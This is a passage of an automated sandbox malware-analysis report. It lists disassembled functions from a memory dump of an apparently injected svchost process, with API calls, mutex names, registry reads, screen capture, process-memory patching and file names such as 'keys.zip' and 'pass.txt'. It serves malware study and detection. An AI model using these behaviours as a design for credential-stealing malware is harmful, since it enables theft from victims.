OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D1C69C
ReleaseMutex.KERNEL32(00000000), ref: 02D1C6A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1C6BD
CloseHandle.KERNEL32(00000000), ref: 02D1C6CF
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D1C6DE
PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C6E5
Sleep.KERNEL32(00009C40,5C590552,BSS), ref: 02D1C6FF
Sleep.KERNEL32(00000064), ref: 02D1C705

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D1C690
5C590552, xrefs: 02D1C6E0, 02D1C6F0
BSS, xrefs: 02D1C6EB
\t, xrefs: 02D1C6E5

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
String ID: 5C590552$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$\t
API String ID: 3206501308-3656192160
Opcode ID: de46310baa5a7078d1551ef410bf1dee71528e5103235debde93cd36da3321a7
Instruction ID: 52cdbaa3332e5da6f9aab64232774d6337a8ab30500302f7893fe03d1a6785fc
Opcode Fuzzy Hash: de46310baa5a7078d1551ef410bf1dee71528e5103235debde93cd36da3321a7
Instruction Fuzzy Hash: 7901DF34DD8355BBE211AF60BC09F1A3798AB09B64F604A05F952927C09BE0AC14CB6B

Function 02D0D850 Relevance: 19.6, APIs: 13, Instructions: 113filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D0D858
HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D869

Part of subcall function 02D0D7A0: GetComputerNameA.KERNEL32(02D4F588,?), ref: 02D0D7B7
Part of subcall function 02D0D7A0: lstrlenA.KERNEL32(02D4F588,?,?,?,02D1714F), ref: 02D0D7C2
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D802
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D812
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D822
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D82F
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D83C

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D4F5A0), ref: 02D0D893
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D8AC

Part of subcall function 02D08D30: SetThreadDesktop.USER32(?,7591F590,759116B0,00000000), ref: 02D08D3F
Part of subcall function 02D08D30: GetDC.USER32(00000000), ref: 02D08D47
Part of subcall function 02D08D30: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02D08D58
Part of subcall function 02D08D30: GetDeviceCaps.GDI32(00000000,00000008), ref: 02D08D69
Part of subcall function 02D08D30: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02D08D80
Part of subcall function 02D08D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02D08DC2
Part of subcall function 02D08D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02D08DD2
Part of subcall function 02D08D30: DeleteObject.GDI32(00000000), ref: 02D08DD5
Part of subcall function 02D08D30: ReleaseDC.USER32(00000000,00000000), ref: 02D08DDE
Part of subcall function 02D08D30: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D08E39

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D4F54C), ref: 02D0D8D9
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D8EC
CreateMutexA.KERNEL32(00000000,00000000,02D4F670,?,?,02D07F92,00000000,00000000), ref: 02D0D90A
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D91B
CreateMutexA.KERNEL32(00000000,00000000,02D4F630,?,?,02D07F92,00000000,00000000), ref: 02D0D92F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D948
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D95B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D96E
CreateEventA.KERNEL32(00000000,00000000,00000000,02D4F5DC,?,?,02D07F92,00000000,00000000), ref: 02D0D984

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
String ID:
API String ID: 2940656088-0
Opcode ID: 7ff7f69dd1693f6a0cf52bda3ad16fa3505a4efe5a40692b0231d7f55adb5c7c
Instruction ID: 4e083b07b953e536c2694319379792e3dd48b2179e26d53ac1f0bc36bc99f6ca
Opcode Fuzzy Hash: 7ff7f69dd1693f6a0cf52bda3ad16fa3505a4efe5a40692b0231d7f55adb5c7c
Instruction Fuzzy Hash: 9E311574FC43127BFB205FA9AC86F152BD8AB04B10F244913B704FA3D0DBE0AC108A68

Function 02D209E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C59061E,?,75A7BF00), ref: 02D20A10
CreateDirectoryA.KERNEL32(?,00000000,?,75A7BF00), ref: 02D20A51
GetLastError.KERNEL32(?,75A7BF00), ref: 02D20A5B
IsUserAnAdmin.SHELL32 ref: 02D20A63
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D20A74
SetLastError.KERNEL32(00000000,?,75A7BF00), ref: 02D20A7B
SetCurrentDirectoryA.KERNEL32(?,?,75A7BF00), ref: 02D20A88
PathAddBackslashA.SHLWAPI(5C59061E,?,?,?,75A7BF00), ref: 02D20AF7

Strings

keys.zip, xrefs: 02D20AA8
5C59061E, xrefs: 02D20A0B, 02D20A12, 02D20AF2, 02D20AF9
path1.txt, xrefs: 02D20B38

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
String ID: 5C59061E$keys.zip$path1.txt
API String ID: 1373881290-1270071694
Opcode ID: a284130451eb2d79ceb264162d1d27cf297738e2055e08bd9dce01f5c6db72b2
Instruction ID: d32ca88ac9844787223592865c8a44b6f5f2263ce3b7eb7d5d07ffa42c9080c1
Opcode Fuzzy Hash: a284130451eb2d79ceb264162d1d27cf297738e2055e08bd9dce01f5c6db72b2
Instruction Fuzzy Hash: EC412474A042654BCB21CF34A8A8AEB7BE4EFB5305F548594E8CAC7300EB70DD48CB90

Function 02D23376 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 134synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D5CF94), ref: 02D2339D
PathAddBackslashA.SHLWAPI(02D5CF94,?,?), ref: 02D23437
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D234A6
DeleteFileA.KERNEL32(?), ref: 02D234B3
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D234E7
Sleep.KERNEL32(000003E8), ref: 02D234F8
ReleaseMutex.KERNEL32(00000000), ref: 02D234FF

Strings

keys.zip, xrefs: 02D233E8
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D234DE
\t, xrefs: 02D23392
keys_path.txt, xrefs: 02D23478

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashFileMutexPath$AttributesCreateDeleteReleaseSleep
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$keys.zip$keys_path.txt$\t
API String ID: 1512046866-2654461300
Opcode ID: 81e30d6aae674505dfbdacb5b45391c9bfc7f6537a24dff0a4831a7aa995c3b5
Instruction ID: d2b524f452c18e5670d93f91e4357cb4ec267de5eef94f4690ffd37b2ac381b7
Opcode Fuzzy Hash: 81e30d6aae674505dfbdacb5b45391c9bfc7f6537a24dff0a4831a7aa995c3b5
Instruction Fuzzy Hash: 24415A349442694FCB16CF24A8A8BEA7BE1EF65304F1486D5D889DB350DF719D49CBC0

Function 02D06A50 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D06A81
memset.MSVCRT ref: 02D06A9F
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D06ABB
RegQueryValueExA.ADVAPI32(?,A3B7FE06a,00000000,00000001,?,00000104), ref: 02D06AE2
GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D06B5A
HeapAlloc.KERNEL32(00000000), ref: 02D06B61
memset.MSVCRT ref: 02D06B75
lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D06B8E
RegCloseKey.ADVAPI32(?), ref: 02D06B9C

Strings

A3B7FE06a, xrefs: 02D06ADC
software\microsoft, xrefs: 02D06AB1

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: A3B7FE06a$software\microsoft
API String ID: 217510255-1900811875
Opcode ID: 016b227b7fcd45c3f2d57459273787ac196fe1224a82e6faabc2105e309f77dd
Instruction ID: 9c2f595ab175ab87c9c7f75ad0ad0f67b23711b9960ed9af754ed3bb572cf64c
Opcode Fuzzy Hash: 016b227b7fcd45c3f2d57459273787ac196fe1224a82e6faabc2105e309f77dd
Instruction Fuzzy Hash: 0931E9B1D4021867EB25DB649C49FDE7BACEF18704F000499E509E6281D7F09E94CBE1

Function 02D068F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D06921
memset.MSVCRT ref: 02D0693F
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02D0695A
RegQueryValueExA.ADVAPI32(80000001,A3B7FE06a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02D06981
GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D069FA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D06A01
memset.MSVCRT ref: 02D06A15
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D06A2E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D06A3C

Strings

A3B7FE06a, xrefs: 02D0697B
software\microsoft, xrefs: 02D06954

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: A3B7FE06a$software\microsoft
API String ID: 217510255-1900811875
Opcode ID: faff29b81b3ae749863697630d4e36ad21bd95375d689b92c64b66fa879ae858
Instruction ID: 20fcb82bfebe8a948311852e66e5df5fbc23fcb1d5b8080778617b1aac6083e3
Opcode Fuzzy Hash: faff29b81b3ae749863697630d4e36ad21bd95375d689b92c64b66fa879ae858
Instruction Fuzzy Hash: 6B31E871D4122867DB14DB649C89BDE7BACEF19B04F404499F509E6280D7B09F94CBE1

Function 02D21869 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90threadCOMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D218CD
GetLastError.KERNEL32 ref: 02D218D7
IsUserAnAdmin.SHELL32 ref: 02D218DF
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D218F0
SetLastError.KERNEL32(00000000), ref: 02D218F7
SetCurrentDirectoryA.KERNEL32(?), ref: 02D21904
CreateThread.KERNEL32(00000000,00000000,02D21AE0,00000000,00000000,00000000), ref: 02D2194A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D21962
CloseHandle.KERNEL32(00000000), ref: 02D21973

Strings

pass.txt, xrefs: 02D2191D
5C590608, xrefs: 02D21882

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakePathSystemThreadUser
String ID: 5C590608$pass.txt
API String ID: 1033491162-2555713871
Opcode ID: 24498f62e08699e79e59d300dfb899407e69a7cee603ae0ee676b72c9509a9b4
Instruction ID: 0f05dc4cdfd3078ccddfe23f95ed38918c7a4de19ef1094b74f77330f3cd04d2
Opcode Fuzzy Hash: 24498f62e08699e79e59d300dfb899407e69a7cee603ae0ee676b72c9509a9b4
Instruction Fuzzy Hash: 09310535A403296BDB208F24A8587EB7BE8EF65344F548694F88997340DBB0DD98CBD0

Function 02D12260 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D12277
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7591F550,00000000), ref: 02D1228E
PathAddBackslashA.SHLWAPI(?,?,7591F550,00000000), ref: 02D1229B
PathFileExistsA.SHLWAPI(?,?,7591F550,00000000), ref: 02D122D7
lstrcpynA.KERNEL32(02D59F08,00000000,00000104,00000000,00000001,?,7591F550,00000000), ref: 02D12301
GetProcessHeap.KERNEL32(00000000,00000000,?,7591F550,00000000), ref: 02D12310
HeapValidate.KERNEL32(00000000,?,7591F550,00000000), ref: 02D12313
GetProcessHeap.KERNEL32(00000000,00000000,?,7591F550,00000000), ref: 02D12320
HeapFree.KERNEL32(00000000,?,7591F550,00000000), ref: 02D12323

Strings

\t, xrefs: 02D1229B
a3b7fb16a, xrefs: 02D122A1

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
String ID: a3b7fb16a$\t
API String ID: 780088666-3373337849
Opcode ID: 910691ed0493fb14957c9764db64bcca464b866342e7991535c065f210583655
Instruction ID: d33ffb4c552892f84f4c842c29fa30f5e1017dae80002dac343539e6673880c0
Opcode Fuzzy Hash: 910691ed0493fb14957c9764db64bcca464b866342e7991535c065f210583655
Instruction Fuzzy Hash: E411E435A8422477DA205A647C1DFDB7BA9DB51702F800144F9C5EB3C0DAE19C90CAD0

Function 02D03940 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D03951
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D168DD), ref: 02D03964
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D03970
GetTickCount.KERNEL32 ref: 02D0399D
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D168DD), ref: 02D039AA
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D039B6
_snprintf.MSVCRT ref: 02D039E9

Strings

ntdll.dll, xrefs: 02D0395F, 02D039A5
RtlUniform, xrefs: 02D0396A, 02D039B0
%x%x, xrefs: 02D039DA
33b091295587945c, xrefs: 02D039E4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick$_snprintf
String ID: %x%x$33b091295587945c$RtlUniform$ntdll.dll
API String ID: 3150073801-3579783
Opcode ID: 76940e92c004eaed448fe060f49181b1fde2bd027ea06a65997077c132677866
Instruction ID: b8f6736b2ae0965956ad9012a92ba34fecb9b24a8a17cde85136be39cff89806
Opcode Fuzzy Hash: 76940e92c004eaed448fe060f49181b1fde2bd027ea06a65997077c132677866
Instruction Fuzzy Hash: 6F016175FC02217FFB449EB9BCC1D6677D9BB817243448D29ED16E2390DBA08D15C6A0

Function 02D243A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D243BC
Sleep.KERNEL32(00000064), ref: 02D243D2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D243E0
ReleaseMutex.KERNEL32(00000000), ref: 02D243E9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D24401
CloseHandle.KERNEL32(00000000), ref: 02D24413
PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D2441E
Sleep.KERNEL32(00009C40,02D5D2A0,YOTA), ref: 02D24438

Strings

YOTA, xrefs: 02D24424
\t, xrefs: 02D2441E
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D243B0, 02D243D4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YOTA$\t
API String ID: 849374196-4290304893
Opcode ID: ff2cecdd35c2ab115a7426a4c5a0698a965de4153ca267a1b94c6967d81320d4
Instruction ID: 4827fa22816556b98c213ccb96e60f0aa32b50006e222b9fe4ecefcc73a68942
Opcode Fuzzy Hash: ff2cecdd35c2ab115a7426a4c5a0698a965de4153ca267a1b94c6967d81320d4
Instruction Fuzzy Hash: B5014536AC03243BF210AA607C4AF5A73D89F64B28F808515FD45923809BF0AC188AB6

Function 02D24030 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D2404C
Sleep.KERNEL32(00000064), ref: 02D24062
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D24070
ReleaseMutex.KERNEL32(00000000), ref: 02D24079
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D24091
CloseHandle.KERNEL32(00000000), ref: 02D240A3
PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D240AE
Sleep.KERNEL32(00009C40,02D5D19C,VEFK), ref: 02D240C8

Strings

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D24040, 02D24064
VEFK, xrefs: 02D240B4
\t, xrefs: 02D240AE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK$\t
API String ID: 849374196-2057582180
Opcode ID: ea5a5ad395c6feb96f993b82607f82044d0f05604089cfdaf7b994b7a9668ed0
Instruction ID: d846b729aa57177870f43500072053e0ac69f0eefb31aece2e592dec5aa9b3f3
Opcode Fuzzy Hash: ea5a5ad395c6feb96f993b82607f82044d0f05604089cfdaf7b994b7a9668ed0
Instruction Fuzzy Hash: 3B01FE35EC13347BF2215F60BC05F5E73C89F55B58F514545FE45963809BE0AC188AB6

Function 02D216E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D216FC
Sleep.KERNEL32(00000064), ref: 02D21712
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D21720
ReleaseMutex.KERNEL32(00000000), ref: 02D21729
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D21741
CloseHandle.KERNEL32(00000000), ref: 02D21753
PathAddBackslashA.SHLWAPI(02D5D4A8), ref: 02D2175E
Sleep.KERNEL32(00009C40,02D5D4A8,OFFSHORE), ref: 02D21778

Strings

\t, xrefs: 02D2175E
OFFSHORE, xrefs: 02D21764
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D216F0, 02D21714

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$OFFSHORE$\t
API String ID: 849374196-363571489
Opcode ID: d84b8ab8f1773be0c6e8f7f69f0d746622aaa629cdc5eee5e0b1103c0ae686f5
Instruction ID: 150bd30a9ae7d1b12a06ec9cf810a0fa2b5ad79b5ad4e2e0f04287c385358174
Opcode Fuzzy Hash: d84b8ab8f1773be0c6e8f7f69f0d746622aaa629cdc5eee5e0b1103c0ae686f5
Instruction Fuzzy Hash: AD012635AC07247BF3106F607C4AF5A73D89FA0BA8F008504FD09923819BF0EC1886B5

Function 02D082E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 44libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D082FE
GetCurrentProcessId.KERNEL32 ref: 02D08306
_snprintf.MSVCRT ref: 02D0831E
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 02D08332
SetErrorMode.KERNEL32(00000002), ref: 02D0833A
LoadLibraryA.KERNEL32(winmm.dll,waveOutOpen), ref: 02D0834A
GetProcAddress.KERNEL32(00000000), ref: 02D08351
WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000006,00000000), ref: 02D08373

Strings

Global\HighMemoryEvent_%08x, xrefs: 02D0830D
waveOutOpen, xrefs: 02D08340
winmm.dll, xrefs: 02D08345

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Process$AddressCreateCurrentErrorLibraryLoadMemoryModeMutexProcWrite_snprintfmemset
String ID: Global\HighMemoryEvent_%08x$waveOutOpen$winmm.dll
API String ID: 45796355-4231559177
Opcode ID: 234377f3acef08537880842126590163bb5b213dc7e4c5472d19c150263e87bd
Instruction ID: cbed47cf48ea9f27a78c105eb759177b0de82b384a2fc4410e517078e9fc563f
Opcode Fuzzy Hash: 234377f3acef08537880842126590163bb5b213dc7e4c5472d19c150263e87bd
Instruction Fuzzy Hash: 37017175984204BBE710EFD0AC4AFA97768AB15701F804688BA45A52C0DBF05E94CFA1

Function 02D1B3F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D1B41C
ReleaseMutex.KERNEL32(00000000), ref: 02D1B425
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1B439
CloseHandle.KERNEL32(00000000), ref: 02D1B44B
PathAddBackslashA.SHLWAPI(5c590506), ref: 02D1B456
Sleep.KERNEL32(00009C40,5c590506,ALPHA), ref: 02D1B470
Sleep.KERNEL32(00000064), ref: 02D1B476

Strings

5c590506, xrefs: 02D1B451, 02D1B461
\t, xrefs: 02D1B456
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D1B410
ALPHA, xrefs: 02D1B45C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5c590506$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$\t
API String ID: 4280258085-3769041950
Opcode ID: e978e91cda3758eed4a745cd45d7503ab7d16e2f9701f60752258cc687d6daf2
Instruction ID: 884be5c891d04cf161787bf1c86a16b82afaf3a901b4ded18760657726329072
Opcode Fuzzy Hash: e978e91cda3758eed4a745cd45d7503ab7d16e2f9701f60752258cc687d6daf2
Instruction Fuzzy Hash: B0F0F430A847147BE6006F61BC0AF5A37D8AF29A0CF50C915F94691380DBE0BD10CAA6

Function 02D1F990 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

